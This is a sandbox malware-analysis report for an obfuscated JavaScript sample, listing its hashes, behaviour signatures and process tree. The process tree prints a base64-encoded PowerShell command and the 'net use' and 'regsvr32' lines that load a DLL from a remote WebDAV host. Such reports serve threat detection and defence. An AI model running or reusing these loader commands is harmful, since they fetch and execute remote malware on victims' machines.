Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
117s -
max time network
118s -
platform
windows7_x64 -
resource
win7-20240708-en -
resource tags
arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system -
submitted
21/08/2024, 15:39
Static task
static1
Behavioral task
behavioral1
Sample
70ec5624f3d3b10e06cc21ff625d8871f81e4d5de1ee2c921a963df7a4015c58.js
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
70ec5624f3d3b10e06cc21ff625d8871f81e4d5de1ee2c921a963df7a4015c58.js
Resource
win10v2004-20240802-en
General
-
Target
70ec5624f3d3b10e06cc21ff625d8871f81e4d5de1ee2c921a963df7a4015c58.js
-
Size
14KB
-
MD5
f565069bbe97855d32a7e9858d4b8ef6
-
SHA1
d3344bd0537addf599ea6682c5871c65887888b0
-
SHA256
70ec5624f3d3b10e06cc21ff625d8871f81e4d5de1ee2c921a963df7a4015c58
-
SHA512
ae791a1cf92182dcc7c105204fca1f2e275daa8e1724d440d79f25e5111d56d7afa07290b88059238003f46b0b8e2ee0ecd989f07c44689ef2a4f7e64463d2d1
-
SSDEEP
96:Ulm1iYg+hW6LOQFLrIjHOZqlfKXq+OdhDidHclR7DewP3/vIkP0OqRozopEGv558:SO7hlsebzE5Pn4H63wC
Malware Config
Signatures
-
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2756 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2756 powershell.exe -
Suspicious use of WriteProcessMemory 11 IoCs
description pid Process procid_target PID 348 wrote to memory of 2756 348 wscript.exe 30 PID 348 wrote to memory of 2756 348 wscript.exe 30 PID 348 wrote to memory of 2756 348 wscript.exe 30 PID 2756 wrote to memory of 2616 2756 powershell.exe 32 PID 2756 wrote to memory of 2616 2756 powershell.exe 32 PID 2756 wrote to memory of 2616 2756 powershell.exe 32 PID 2756 wrote to memory of 2768 2756 powershell.exe 33 PID 2756 wrote to memory of 2768 2756 powershell.exe 33 PID 2756 wrote to memory of 2768 2756 powershell.exe 33 PID 2756 wrote to memory of 2768 2756 powershell.exe 33 PID 2756 wrote to memory of 2768 2756 powershell.exe 33
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\70ec5624f3d3b10e06cc21ff625d8871f81e4d5de1ee2c921a963df7a4015c58.js1⤵
- Suspicious use of WriteProcessMemory
PID:348 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXABjAGwAbwB1AGQAcwBsAGkAbQBpAHQALgBjAG8AbQBAADgAOAA4ADgAXABkAGEAdgB3AHcAdwByAG8AbwB0AFwAIAA7ACAAcgBlAGcAcwB2AHIAMwAyACAALwBzACAAXABcAGMAbABvAHUAZABzAGwAaQBtAGkAdAAuAGMAbwBtAEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAAxADEAOQA5ADQAMgAwADIAMAA1ADUAOQAzADUALgBkAGwAbAA=2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2756 -
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" use \\cloudslimit.com@8888\davwwwroot\3⤵PID:2616
-
-
C:\Windows\system32\regsvr32.exe"C:\Windows\system32\regsvr32.exe" /s \\cloudslimit.com@8888\davwwwroot\11994202055935.dll3⤵PID:2768
-
-